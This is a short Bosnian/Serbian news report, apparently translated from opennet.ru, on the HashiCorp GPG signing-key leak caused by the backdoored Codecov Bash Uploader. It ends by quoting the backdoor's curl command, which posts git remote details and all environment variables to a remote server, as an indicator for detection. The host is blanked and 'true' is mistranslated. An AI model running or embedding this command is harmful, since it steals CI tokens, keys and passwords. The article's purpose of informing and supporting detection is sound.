HashiCorp, poznat po razvoju alata otvorenog koda Vagrant, Packer, Nomad i Terraform, najavio je curenje privatnog GPG ključa koji se koristi za kreiranje digitalnih potpisa koji verificiraju izdanja. Napadači koji su dobili pristup GPG ključu mogli bi potencijalno napraviti skrivene promjene na HashiCorp proizvodima tako što bi ih verifikovali ispravnim digitalnim potpisom. Istovremeno, kompanija je saopštila da tokom revizije nisu identifikovani tragovi pokušaja ovakvih modifikacija.
Trenutno je kompromitovani GPG ključ povučen i umjesto njega uveden je novi ključ. Problem je uticao samo na verifikaciju pomoću datoteka SHA256SUM i SHA256SUM.sig, i nije uticao na generiranje digitalnih potpisa za Linux DEB i RPM pakete koji se isporučuju preko releases.hashicorp.com, kao i na mehanizme verifikacije izdanja za macOS i Windows (AuthentiCode) .
Do curenja je došlo zbog upotrebe skripte Codecov Bash Uploader (codecov-bash) u infrastrukturi, dizajnirane za preuzimanje izvještaja o pokrivenosti iz sistema kontinuirane integracije. Tokom napada na kompaniju Codecov, u navedenu skriptu je sakriven backdoor, preko kojeg su lozinke i ključevi za šifrovanje poslani na server napadača.
Za hakiranje, napadači su iskoristili grešku u procesu kreiranja Codecov Docker slike, koja im je omogućila da ekstrahuju pristupne podatke GCS-u (Google Cloud Storage), neophodnim za izmjene Bash Uploader skripte distribuirane sa codecov.io web stranica. Promjene su napravljene još 31. januara, ostale su neotkrivene dva mjeseca i omogućile su napadačima da izvuku informacije pohranjene u okruženjima sistema kontinuirane integracije korisnika. Koristeći dodani zlonamjerni kod, napadači bi mogli dobiti informacije o testiranom Git spremištu i svim varijablama okruženja, uključujući tokene, ključeve za šifriranje i lozinke koje se prenose u sisteme kontinuirane integracije kako bi organizirali pristup kodu aplikacije, spremištima i uslugama kao što su Amazon Web Services i GitHub.
Pored direktnog poziva, skripta Codecov Bash Uploader je korišćena kao deo drugih uploadera, kao što su Codecov-action (Github), Codecov-circleci-orb i Codecov-bitrise-step, na čije korisnike takođe utiče problem. Svim korisnicima codecov-bash i srodnih proizvoda preporučuje se revizija svoje infrastrukture, kao i promjena lozinki i ključeva za šifriranje. Možete provjeriti prisustvo backdoor-a u skripti prisustvom linije curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || istinito
izvor: opennet.ru